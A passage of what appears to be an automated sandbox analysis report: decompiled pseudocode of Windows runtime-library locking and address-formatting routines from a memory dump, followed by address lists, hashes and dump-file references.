                                                                                                                                                            						if(_t115 >= 0) {
                                                                                                                                                            							break;
                                                                                                                                                            						}
                                                                                                                                                            						__eflags = _a8;
                                                                                                                                                            						if(_a8 == 0) {
                                                                                                                                                            							__eflags = 0;
                                                                                                                                                            							return 0;
                                                                                                                                                            						} else {
                                                                                                                                                            							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
                                                                                                                                                            							_t49 = _t96 + 0x1c;
                                                                                                                                                            							_t106 = 1;
                                                                                                                                                            							asm("lock xadd [edx], ecx");
                                                                                                                                                            							_t115 =  *(_t96 + 0x28);
                                                                                                                                                            							__eflags = _t115;
                                                                                                                                                            							if(_t115 < 0) {
                                                                                                                                                            								L23:
                                                                                                                                                            								_t130 = 0;
                                                                                                                                                            								__eflags = 0;
                                                                                                                                                            								while(1) {
                                                                                                                                                            									_t118 =  *(_t96 + 0x30) & 0x00000001;
                                                                                                                                                            									asm("sbb esi, esi");
                                                                                                                                                            									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x00a301c0;
                                                                                                                                                            									_push(_t144);
                                                                                                                                                            									_push(0);
                                                                                                                                                            									_t51 = E0094F8CC( *((intOrPtr*)(_t96 + 0x18)));
                                                                                                                                                            									__eflags = _t51 - 0x102;
                                                                                                                                                            									if(_t51 != 0x102) {
                                                                                                                                                            										break;
                                                                                                                                                            									}
                                                                                                                                                            									_t106 =  *(_t144 + 4);
                                                                                                                                                            									_t126 =  *_t144;
                                                                                                                                                            									_t86 = E00994FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
                                                                                                                                                            									_push(_t126);
                                                                                                                                                            									_push(_t86);
                                                                                                                                                            									E009A3F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
                                                                                                                                                            									E009A3F92(0x65, 0, "RTL: Resource at %p\n", _t96);
                                                                                                                                                            									_t130 = _t130 + 1;
                                                                                                                                                            									_t160 = _t158 + 0x28;
                                                                                                                                                            									__eflags = _t130 - 2;
                                                                                                                                                            									if(__eflags > 0) {
                                                                                                                                                            										E009D217A(_t106, __eflags, _t96);
                                                                                                                                                            									}
                                                                                                                                                            									_push("RTL: Re-Waiting\n");
                                                                                                                                                            									_push(0);
                                                                                                                                                            									_push(0x65);
                                                                                                                                                            									E009A3F92();
                                                                                                                                                            									_t158 = _t160 + 0xc;
                                                                                                                                                            								}
                                                                                                                                                            								__eflags = _t51;
                                                                                                                                                            								if(__eflags < 0) {
                                                                                                                                                            									_push(_t51);
                                                                                                                                                            									E00993915(_t96, _t106, _t118, _t130, _t144, __eflags);
                                                                                                                                                            									asm("int3");
                                                                                                                                                            									while(1) {
                                                                                                                                                            										L32:
                                                                                                                                                            										__eflags = _a8;
                                                                                                                                                            										if(_a8 == 0) {
                                                                                                                                                            											break;
                                                                                                                                                            										}
                                                                                                                                                            										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
                                                                                                                                                            										_t119 = _t96 + 0x24;
                                                                                                                                                            										_t107 = 1;
                                                                                                                                                            										asm("lock xadd [eax], ecx");
                                                                                                                                                            										_t56 =  *(_t96 + 0x28);
                                                                                                                                                            										_a4 = _t56;
                                                                                                                                                            										__eflags = _t56;
                                                                                                                                                            										if(_t56 != 0) {
                                                                                                                                                            											L40:
                                                                                                                                                            											_t128 = 0;
                                                                                                                                                            											__eflags = 0;
                                                                                                                                                            											while(1) {
                                                                                                                                                            												_t121 =  *(_t96 + 0x30) & 0x00000001;
                                                                                                                                                            												asm("sbb esi, esi");
                                                                                                                                                            												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x00a301c0;
                                                                                                                                                            												_push(_t138);
                                                                                                                                                            												_push(0);
                                                                                                                                                            												_t58 = E0094F8CC( *((intOrPtr*)(_t96 + 0x20)));
                                                                                                                                                            												__eflags = _t58 - 0x102;
                                                                                                                                                            												if(_t58 != 0x102) {
                                                                                                                                                            													break;
                                                                                                                                                            												}
                                                                                                                                                            												_t107 =  *(_t138 + 4);
                                                                                                                                                            												_t125 =  *_t138;
                                                                                                                                                            												_t75 = E00994FC0(_t125, _t107, 0xff676980, 0xffffffff);
                                                                                                                                                            												_push(_t125);
                                                                                                                                                            												_push(_t75);
                                                                                                                                                            												E009A3F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
                                                                                                                                                            												E009A3F92(0x65, 0, "RTL: Resource at %p\n", _t96);
                                                                                                                                                            												_t128 = _t128 + 1;
                                                                                                                                                            												_t159 = _t158 + 0x28;
                                                                                                                                                            												__eflags = _t128 - 2;
                                                                                                                                                            												if(__eflags > 0) {
                                                                                                                                                            													E009D217A(_t107, __eflags, _t96);
                                                                                                                                                            												}
                                                                                                                                                            												_push("RTL: Re-Waiting\n");
                                                                                                                                                            												_push(0);
                                                                                                                                                            												_push(0x65);
                                                                                                                                                            												E009A3F92();
                                                                                                                                                            												_t158 = _t159 + 0xc;
                                                                                                                                                            											}
                                                                                                                                                            											__eflags = _t58;
                                                                                                                                                            											if(__eflags < 0) {
                                                                                                                                                            												_push(_t58);
                                                                                                                                                            												E00993915(_t96, _t107, _t121, _t128, _t138, __eflags);
                                                                                                                                                            												asm("int3");
                                                                                                                                                            												_t61 =  *_t107;
                                                                                                                                                            												 *_t107 = 0;
                                                                                                                                                            												__eflags = _t61;
                                                                                                                                                            												if(_t61 == 0) {
                                                                                                                                                            													L1:
                                                                                                                                                            													_t63 = E00975384(_t138 + 0x24);
                                                                                                                                                            													if(_t63 != 0) {
                                                                                                                                                            														goto L52;
                                                                                                                                                            													} else {
                                                                                                                                                            														goto L2;
                                                                                                                                                            													}
                                                                                                                                                            												} else {
                                                                                                                                                            													_t123 =  *((intOrPtr*)(_t138 + 0x18));
                                                                                                                                                            													_push( &_a4);
                                                                                                                                                            													_push(_t61);
                                                                                                                                                            													_t70 = E0094F970( *((intOrPtr*)(_t138 + 0x18)));
                                                                                                                                                            													__eflags = _t70;
                                                                                                                                                            													if(__eflags >= 0) {
                                                                                                                                                            														goto L1;
                                                                                                                                                            													} else {
                                                                                                                                                            														_push(_t70);
                                                                                                                                                            														E00993915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
                                                                                                                                                            														L52:
                                                                                                                                                            														_t122 =  *((intOrPtr*)(_t138 + 0x20));
                                                                                                                                                            														_push( &_a4);
                                                                                                                                                            														_push(1);
                                                                                                                                                            														_t63 = E0094F970( *((intOrPtr*)(_t138 + 0x20)));
                                                                                                                                                            														__eflags = _t63;
                                                                                                                                                            														if(__eflags >= 0) {
                                                                                                                                                            															L2:
                                                                                                                                                            															return _t63;
                                                                                                                                                            														} else {
                                                                                                                                                            															_push(_t63);
                                                                                                                                                            															E00993915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
                                                                                                                                                            															_t109 =  *((intOrPtr*)(_t138 + 0x20));
                                                                                                                                                            															_push( &_a4);
                                                                                                                                                            															_push(1);
                                                                                                                                                            															_t63 = E0094F970( *((intOrPtr*)(_t138 + 0x20)));
                                                                                                                                                            															__eflags = _t63;
                                                                                                                                                            															if(__eflags >= 0) {
                                                                                                                                                            																goto L2;
                                                                                                                                                            															} else {
                                                                                                                                                            																_push(_t63);
                                                                                                                                                            																_t66 = E00993915(_t96, _t109, _t122, _t128, _t138, __eflags);
                                                                                                                                                            																asm("int3");
                                                                                                                                                            																while(1) {
                                                                                                                                                            																	_t110 = _t66;
                                                                                                                                                            																	__eflags = _t66 - 1;
                                                                                                                                                            																	if(_t66 != 1) {
                                                                                                                                                            																		break;
                                                                                                                                                            																	}
                                                                                                                                                            																	_t128 = _t128 | 0xffffffff;
                                                                                                                                                            																	_t66 = _t110;
                                                                                                                                                            																	asm("lock cmpxchg [ebx], edi");
                                                                                                                                                            																	__eflags = _t66 - _t110;
                                                                                                                                                            																	if(_t66 != _t110) {
                                                                                                                                                            																		continue;
                                                                                                                                                            																	} else {
                                                                                                                                                            																		_t67 =  *[fs:0x18];
                                                                                                                                                            																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
                                                                                                                                                            																		return _t67;
                                                                                                                                                            																	}
                                                                                                                                                            																	goto L59;
                                                                                                                                                            																}
                                                                                                                                                            																E00975329(_t110, _t138);
                                                                                                                                                            																_t69 = E009753A5(_t138, 1);
                                                                                                                                                            																return _t69;
                                                                                                                                                            															}
                                                                                                                                                            														}
                                                                                                                                                            													}
                                                                                                                                                            												}
                                                                                                                                                            											} else {
                                                                                                                                                            												_t56 =  *(_t96 + 0x28);
                                                                                                                                                            												goto L3;
                                                                                                                                                            											}
                                                                                                                                                            										} else {
                                                                                                                                                            											_t107 =  *_t119;
                                                                                                                                                            											__eflags = _t107;
                                                                                                                                                            											if(__eflags > 0) {
                                                                                                                                                            												while(1) {
                                                                                                                                                            													_t81 = _t107;
                                                                                                                                                            													asm("lock cmpxchg [edi], esi");
                                                                                                                                                            													__eflags = _t81 - _t107;
                                                                                                                                                            													if(_t81 == _t107) {
                                                                                                                                                            														break;
                                                                                                                                                            													}
                                                                                                                                                            													_t107 = _t81;
                                                                                                                                                            													__eflags = _t81;
                                                                                                                                                            													if(_t81 > 0) {
                                                                                                                                                            														continue;
                                                                                                                                                            													}
                                                                                                                                                            													break;
                                                                                                                                                            												}
                                                                                                                                                            												_t56 = _a4;
                                                                                                                                                            												__eflags = _t107;
                                                                                                                                                            											}
                                                                                                                                                            											if(__eflags != 0) {
                                                                                                                                                            												while(1) {
                                                                                                                                                            													L3:
                                                                                                                                                            													__eflags = _t56;
                                                                                                                                                            													if(_t56 != 0) {
                                                                                                                                                            														goto L32;
                                                                                                                                                            													}
                                                                                                                                                            													_t107 = _t107 | 0xffffffff;
                                                                                                                                                            													_t56 = 0;
                                                                                                                                                            													asm("lock cmpxchg [edx], ecx");
                                                                                                                                                            													__eflags = 0;
                                                                                                                                                            													if(0 != 0) {
                                                                                                                                                            														continue;
                                                                                                                                                            													} else {
                                                                                                                                                            														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                                                                                                                                            														return 1;
                                                                                                                                                            													}
                                                                                                                                                            													goto L59;
                                                                                                                                                            												}
                                                                                                                                                            												continue;
                                                                                                                                                            											} else {
                                                                                                                                                            												goto L40;
                                                                                                                                                            											}
                                                                                                                                                            										}
                                                                                                                                                            										goto L59;
                                                                                                                                                            									}
                                                                                                                                                            									__eflags = 0;
                                                                                                                                                            									return 0;
                                                                                                                                                            								} else {
                                                                                                                                                            									_t115 =  *(_t96 + 0x28);
                                                                                                                                                            									continue;
                                                                                                                                                            								}
                                                                                                                                                            							} else {
                                                                                                                                                            								_t106 =  *_t49;
                                                                                                                                                            								__eflags = _t106;
                                                                                                                                                            								if(__eflags > 0) {
                                                                                                                                                            									while(1) {
                                                                                                                                                            										_t93 = _t106;
                                                                                                                                                            										asm("lock cmpxchg [edi], esi");
                                                                                                                                                            										__eflags = _t93 - _t106;
                                                                                                                                                            										if(_t93 == _t106) {
                                                                                                                                                            											break;
                                                                                                                                                            										}
                                                                                                                                                            										_t106 = _t93;
                                                                                                                                                            										__eflags = _t93;
                                                                                                                                                            										if(_t93 > 0) {
                                                                                                                                                            											continue;
                                                                                                                                                            										}
                                                                                                                                                            										break;
                                                                                                                                                            									}
                                                                                                                                                            									__eflags = _t106;
                                                                                                                                                            								}
                                                                                                                                                            								if(__eflags != 0) {
                                                                                                                                                            									continue;
                                                                                                                                                            								} else {
                                                                                                                                                            									goto L23;
                                                                                                                                                            								}
                                                                                                                                                            							}
                                                                                                                                                            						}
                                                                                                                                                            						goto L59;
                                                                                                                                                            					}
                                                                                                                                                            					_t84 = _t115;
                                                                                                                                                            					asm("lock cmpxchg [esi], ecx");
                                                                                                                                                            					__eflags = _t84 - _t115;
                                                                                                                                                            					if(_t84 != _t115) {
                                                                                                                                                            						_t115 = _t84;
                                                                                                                                                            						goto L7;
                                                                                                                                                            					} else {
                                                                                                                                                            						return 1;
                                                                                                                                                            					}
                                                                                                                                                            				}
                                                                                                                                                            				L59:
                                                                                                                                                            			}




































                                                                                                                                                            0x0099055a
                                                                                                                                                            0x0099055d
                                                                                                                                                            0x00990563
                                                                                                                                                            0x00990566
                                                                                                                                                            0x009905d8
                                                                                                                                                            0x009905e2
                                                                                                                                                            0x009905e5
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009905e7
                                                                                                                                                            0x009905e7
                                                                                                                                                            0x009905ea
                                                                                                                                                            0x009905f3
                                                                                                                                                            0x009905f3
                                                                                                                                                            0x00990568
                                                                                                                                                            0x00990568
                                                                                                                                                            0x00990568
                                                                                                                                                            0x00990569
                                                                                                                                                            0x00990569
                                                                                                                                                            0x00990569
                                                                                                                                                            0x0099056b
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009b217f
                                                                                                                                                            0x009b2183
                                                                                                                                                            0x009b225b
                                                                                                                                                            0x009b225f
                                                                                                                                                            0x009b2189
                                                                                                                                                            0x009b218c
                                                                                                                                                            0x009b218f
                                                                                                                                                            0x009b2194
                                                                                                                                                            0x009b2199
                                                                                                                                                            0x009b219d
                                                                                                                                                            0x009b21a0
                                                                                                                                                            0x009b21a2
                                                                                                                                                            0x009b21ce
                                                                                                                                                            0x009b21ce
                                                                                                                                                            0x009b21ce
                                                                                                                                                            0x009b21d0
                                                                                                                                                            0x009b21d6
                                                                                                                                                            0x009b21de
                                                                                                                                                            0x009b21e2
                                                                                                                                                            0x009b21e8
                                                                                                                                                            0x009b21e9
                                                                                                                                                            0x009b21ec
                                                                                                                                                            0x009b21f1
                                                                                                                                                            0x009b21f6
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009b21f8
                                                                                                                                                            0x009b21fb
                                                                                                                                                            0x009b2206
                                                                                                                                                            0x009b220b
                                                                                                                                                            0x009b220c
                                                                                                                                                            0x009b2217
                                                                                                                                                            0x009b2226
                                                                                                                                                            0x009b222b
                                                                                                                                                            0x009b222c
                                                                                                                                                            0x009b222f
                                                                                                                                                            0x009b2232
                                                                                                                                                            0x009b2235
                                                                                                                                                            0x009b2235
                                                                                                                                                            0x009b223a
                                                                                                                                                            0x009b223f
                                                                                                                                                            0x009b2241
                                                                                                                                                            0x009b2243
                                                                                                                                                            0x009b2248
                                                                                                                                                            0x009b2248
                                                                                                                                                            0x009b224d
                                                                                                                                                            0x009b224f
                                                                                                                                                            0x009b2262
                                                                                                                                                            0x009b2263
                                                                                                                                                            0x009b2268
                                                                                                                                                            0x009b2269
                                                                                                                                                            0x009b2269
                                                                                                                                                            0x009b2269
                                                                                                                                                            0x009b226d
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009b2276
                                                                                                                                                            0x009b2279
                                                                                                                                                            0x009b227e
                                                                                                                                                            0x009b2283
                                                                                                                                                            0x009b2287
                                                                                                                                                            0x009b228a
                                                                                                                                                            0x009b228d
                                                                                                                                                            0x009b228f
                                                                                                                                                            0x009b22bc
                                                                                                                                                            0x009b22bc
                                                                                                                                                            0x009b22bc
                                                                                                                                                            0x009b22be
                                                                                                                                                            0x009b22c4
                                                                                                                                                            0x009b22cc
                                                                                                                                                            0x009b22d0
                                                                                                                                                            0x009b22d6
                                                                                                                                                            0x009b22d7
                                                                                                                                                            0x009b22da
                                                                                                                                                            0x009b22df
                                                                                                                                                            0x009b22e4
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009b22e6
                                                                                                                                                            0x009b22e9
                                                                                                                                                            0x009b22f4
                                                                                                                                                            0x009b22f9
                                                                                                                                                            0x009b22fa
                                                                                                                                                            0x009b2305
                                                                                                                                                            0x009b2314
                                                                                                                                                            0x009b2319
                                                                                                                                                            0x009b231a
                                                                                                                                                            0x009b231d
                                                                                                                                                            0x009b2320
                                                                                                                                                            0x009b2323
                                                                                                                                                            0x009b2323
                                                                                                                                                            0x009b2328
                                                                                                                                                            0x009b232d
                                                                                                                                                            0x009b232f
                                                                                                                                                            0x009b2331
                                                                                                                                                            0x009b2336
                                                                                                                                                            0x009b2336
                                                                                                                                                            0x009b233b
                                                                                                                                                            0x009b233d
                                                                                                                                                            0x009b2350
                                                                                                                                                            0x009b2351
                                                                                                                                                            0x009b2356
                                                                                                                                                            0x009b2359
                                                                                                                                                            0x009b2359
                                                                                                                                                            0x009b235b
                                                                                                                                                            0x009b235d
                                                                                                                                                            0x00975367
                                                                                                                                                            0x0097536b
                                                                                                                                                            0x00975372
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009b2363
                                                                                                                                                            0x009b2363
                                                                                                                                                            0x009b2369
                                                                                                                                                            0x009b236a
                                                                                                                                                            0x009b236c
                                                                                                                                                            0x009b2371
                                                                                                                                                            0x009b2373
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009b2379
                                                                                                                                                            0x009b2379
                                                                                                                                                            0x009b237a
                                                                                                                                                            0x009b237f
                                                                                                                                                            0x009b237f
                                                                                                                                                            0x009b2385
                                                                                                                                                            0x009b2386
                                                                                                                                                            0x009b2389
                                                                                                                                                            0x009b238e
                                                                                                                                                            0x009b2390
                                                                                                                                                            0x00975378
                                                                                                                                                            0x0097537c
                                                                                                                                                            0x009b2396
                                                                                                                                                            0x009b2396
                                                                                                                                                            0x009b2397
                                                                                                                                                            0x009b239c
                                                                                                                                                            0x009b23a2
                                                                                                                                                            0x009b23a3
                                                                                                                                                            0x009b23a6
                                                                                                                                                            0x009b23ab
                                                                                                                                                            0x009b23ad
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009b23b3
                                                                                                                                                            0x009b23b3
                                                                                                                                                            0x009b23b4
                                                                                                                                                            0x009b23b9
                                                                                                                                                            0x009b23ba
                                                                                                                                                            0x009b23ba
                                                                                                                                                            0x009b23bc
                                                                                                                                                            0x009b23bf
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009a9153
                                                                                                                                                            0x009a9158
                                                                                                                                                            0x009a915a
                                                                                                                                                            0x009a915e
                                                                                                                                                            0x009a9160
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009a9166
                                                                                                                                                            0x009a9166
                                                                                                                                                            0x009a9171
                                                                                                                                                            0x009a9176
                                                                                                                                                            0x009a9176
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009a9160
                                                                                                                                                            0x009b23c6
                                                                                                                                                            0x009b23ce
                                                                                                                                                            0x009b23d7
                                                                                                                                                            0x009b23d7
                                                                                                                                                            0x009b23ad
                                                                                                                                                            0x009b2390
                                                                                                                                                            0x009b2373
                                                                                                                                                            0x009b233f
                                                                                                                                                            0x009b233f
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009b233f
                                                                                                                                                            0x009b2291
                                                                                                                                                            0x009b2291
                                                                                                                                                            0x009b2293
                                                                                                                                                            0x009b2295
                                                                                                                                                            0x009b229a
                                                                                                                                                            0x009b22a1
                                                                                                                                                            0x009b22a3
                                                                                                                                                            0x009b22a7
                                                                                                                                                            0x009b22a9
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009b22ab
                                                                                                                                                            0x009b22ad
                                                                                                                                                            0x009b22af
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009b22af
                                                                                                                                                            0x009b22b1
                                                                                                                                                            0x009b22b4
                                                                                                                                                            0x009b22b4
                                                                                                                                                            0x009b22b6
                                                                                                                                                            0x009753be
                                                                                                                                                            0x009753be
                                                                                                                                                            0x009753be
                                                                                                                                                            0x009753c0
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009753cb
                                                                                                                                                            0x009753ce
                                                                                                                                                            0x009753d0
                                                                                                                                                            0x009753d4
                                                                                                                                                            0x009753d6
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009753d8
                                                                                                                                                            0x009753e3
                                                                                                                                                            0x009753ea
                                                                                                                                                            0x009753ea
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009753d6
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009b22b6
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009b228f
                                                                                                                                                            0x009b2349
                                                                                                                                                            0x009b234d
                                                                                                                                                            0x009b2251
                                                                                                                                                            0x009b2251
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009b2251
                                                                                                                                                            0x009b21a4
                                                                                                                                                            0x009b21a4
                                                                                                                                                            0x009b21a6
                                                                                                                                                            0x009b21a8
                                                                                                                                                            0x009b21ac
                                                                                                                                                            0x009b21b6
                                                                                                                                                            0x009b21b8
                                                                                                                                                            0x009b21bc
                                                                                                                                                            0x009b21be
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009b21c0
                                                                                                                                                            0x009b21c2
                                                                                                                                                            0x009b21c4
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009b21c4
                                                                                                                                                            0x009b21c6
                                                                                                                                                            0x009b21c6
                                                                                                                                                            0x009b21c8
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009b21c8
                                                                                                                                                            0x009b21a2
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009b2183
                                                                                                                                                            0x0099057b
                                                                                                                                                            0x0099057d
                                                                                                                                                            0x00990581
                                                                                                                                                            0x00990583
                                                                                                                                                            0x009b2178
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00990589
                                                                                                                                                            0x0099058f
                                                                                                                                                            0x0099058f
                                                                                                                                                            0x00990583
                                                                                                                                                            0x00000000

                                                                                                                                                            APIs
                                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009B2206
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.2218202835.0000000000940000.00000040.00000001.sdmp, Offset: 00930000, based on PE: true
                                                                                                                                                            • Associated: 00000006.00000002.2218194748.0000000000930000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218362808.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218367843.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218373725.0000000000A34000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218380017.0000000000A37000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218387315.0000000000A40000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218455487.0000000000AA0000.00000040.00000001.sdmp Download File
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                            • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                            • API String ID: 885266447-4236105082
                                                                                                                                                            • Opcode ID: e6af5e30518601338a73e8195e75c99cc5eb28999f330ef63dbc9bfa25afd2bd
                                                                                                                                                            • Instruction ID: 9bae278fc26c2c3049b444dadc1e273a5201bef463301e39459e623b54441f4a
                                                                                                                                                            • Opcode Fuzzy Hash: e6af5e30518601338a73e8195e75c99cc5eb28999f330ef63dbc9bfa25afd2bd
                                                                                                                                                            • Instruction Fuzzy Hash: C05137317442016FEB15CB19CC82FA633ADEBD4725F218229FD59DF285DA31EC828B90
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 64%
                                                                                                                                                            			E009914C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
                                                                                                                                                            				signed int _v8;
                                                                                                                                                            				char _v10;
                                                                                                                                                            				char _v140;
                                                                                                                                                            				void* __ebx;
                                                                                                                                                            				void* __edi;
                                                                                                                                                            				void* __esi;
                                                                                                                                                            				signed int _t24;
                                                                                                                                                            				void* _t26;
                                                                                                                                                            				signed int _t29;
                                                                                                                                                            				signed int _t34;
                                                                                                                                                            				signed int _t40;
                                                                                                                                                            				intOrPtr _t45;
                                                                                                                                                            				void* _t51;
                                                                                                                                                            				intOrPtr* _t52;
                                                                                                                                                            				void* _t54;
                                                                                                                                                            				signed int _t57;
                                                                                                                                                            				void* _t58;
                                                                                                                                                            
                                                                                                                                                            				_t51 = __edx;
                                                                                                                                                            				_t24 =  *0xa32088; // 0x7769a8cb
                                                                                                                                                            				_v8 = _t24 ^ _t57;
                                                                                                                                                            				_t45 = _a16;
                                                                                                                                                            				_t53 = _a4;
                                                                                                                                                            				_t52 = _a20;
                                                                                                                                                            				if(_a4 == 0 || _t52 == 0) {
                                                                                                                                                            					L10:
                                                                                                                                                            					_t26 = 0xc000000d;
                                                                                                                                                            				} else {
                                                                                                                                                            					if(_t45 == 0) {
                                                                                                                                                            						if( *_t52 == _t45) {
                                                                                                                                                            							goto L3;
                                                                                                                                                            						} else {
                                                                                                                                                            							goto L10;
                                                                                                                                                            						}
                                                                                                                                                            					} else {
                                                                                                                                                            						L3:
                                                                                                                                                            						_t28 =  &_v140;
                                                                                                                                                            						if(_a12 != 0) {
                                                                                                                                                            							_push("[");
                                                                                                                                                            							_push(0x41);
                                                                                                                                                            							_push( &_v140);
                                                                                                                                                            							_t29 = E00987707();
                                                                                                                                                            							_t58 = _t58 + 0xc;
                                                                                                                                                            							_t28 = _t57 + _t29 * 2 - 0x88;
                                                                                                                                                            						}
                                                                                                                                                            						_t54 = E009913CB(_t53, _t28);
                                                                                                                                                            						if(_a8 != 0) {
                                                                                                                                                            							_t34 = E00987707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
                                                                                                                                                            							_t58 = _t58 + 0x10;
                                                                                                                                                            							_t54 = _t54 + _t34 * 2;
                                                                                                                                                            						}
                                                                                                                                                            						if(_a12 != 0) {
                                                                                                                                                            							_t40 = E00987707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
                                                                                                                                                            							_t58 = _t58 + 0x10;
                                                                                                                                                            							_t54 = _t54 + _t40 * 2;
                                                                                                                                                            						}
                                                                                                                                                            						_t53 = (_t54 -  &_v140 >> 1) + 1;
                                                                                                                                                            						 *_t52 = _t53;
                                                                                                                                                            						if( *_t52 < _t53) {
                                                                                                                                                            							goto L10;
                                                                                                                                                            						} else {
                                                                                                                                                            							E00952340(_t45,  &_v140, _t53 + _t53);
                                                                                                                                                            							_t26 = 0;
                                                                                                                                                            						}
                                                                                                                                                            					}
                                                                                                                                                            				}
                                                                                                                                                            				return E0095E1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
                                                                                                                                                            			}




















                                                                                                                                                            0x009914c0
                                                                                                                                                            0x009914cb
                                                                                                                                                            0x009914d2
                                                                                                                                                            0x009914d6
                                                                                                                                                            0x009914da
                                                                                                                                                            0x009914de
                                                                                                                                                            0x009914e3
                                                                                                                                                            0x0099157a
                                                                                                                                                            0x0099157a
                                                                                                                                                            0x009914f1
                                                                                                                                                            0x009914f3
                                                                                                                                                            0x009bea0f
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009bea15
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009bea15
                                                                                                                                                            0x009914f9
                                                                                                                                                            0x009914f9
                                                                                                                                                            0x009914fe
                                                                                                                                                            0x00991504
                                                                                                                                                            0x009bea1a
                                                                                                                                                            0x009bea1f
                                                                                                                                                            0x009bea21
                                                                                                                                                            0x009bea22
                                                                                                                                                            0x009bea27
                                                                                                                                                            0x009bea2a
                                                                                                                                                            0x009bea2a
                                                                                                                                                            0x00991515
                                                                                                                                                            0x00991517
                                                                                                                                                            0x0099156d
                                                                                                                                                            0x00991572
                                                                                                                                                            0x00991575
                                                                                                                                                            0x00991575
                                                                                                                                                            0x0099151e
                                                                                                                                                            0x009bea50
                                                                                                                                                            0x009bea55
                                                                                                                                                            0x009bea58
                                                                                                                                                            0x009bea58
                                                                                                                                                            0x0099152e
                                                                                                                                                            0x00991531
                                                                                                                                                            0x00991533
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00991535
                                                                                                                                                            0x00991541
                                                                                                                                                            0x00991549
                                                                                                                                                            0x00991549
                                                                                                                                                            0x00991533
                                                                                                                                                            0x009914f3
                                                                                                                                                            0x00991559

                                                                                                                                                            APIs
                                                                                                                                                            • ___swprintf_l.LIBCMT ref: 009BEA22
                                                                                                                                                              • Part of subcall function 009913CB: ___swprintf_l.LIBCMT ref: 0099146B
                                                                                                                                                              • Part of subcall function 009913CB: ___swprintf_l.LIBCMT ref: 00991490
                                                                                                                                                            • ___swprintf_l.LIBCMT ref: 0099156D
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.2218202835.0000000000940000.00000040.00000001.sdmp, Offset: 00930000, based on PE: true
                                                                                                                                                            • Associated: 00000006.00000002.2218194748.0000000000930000.00000040.00000001.sdmp Download File
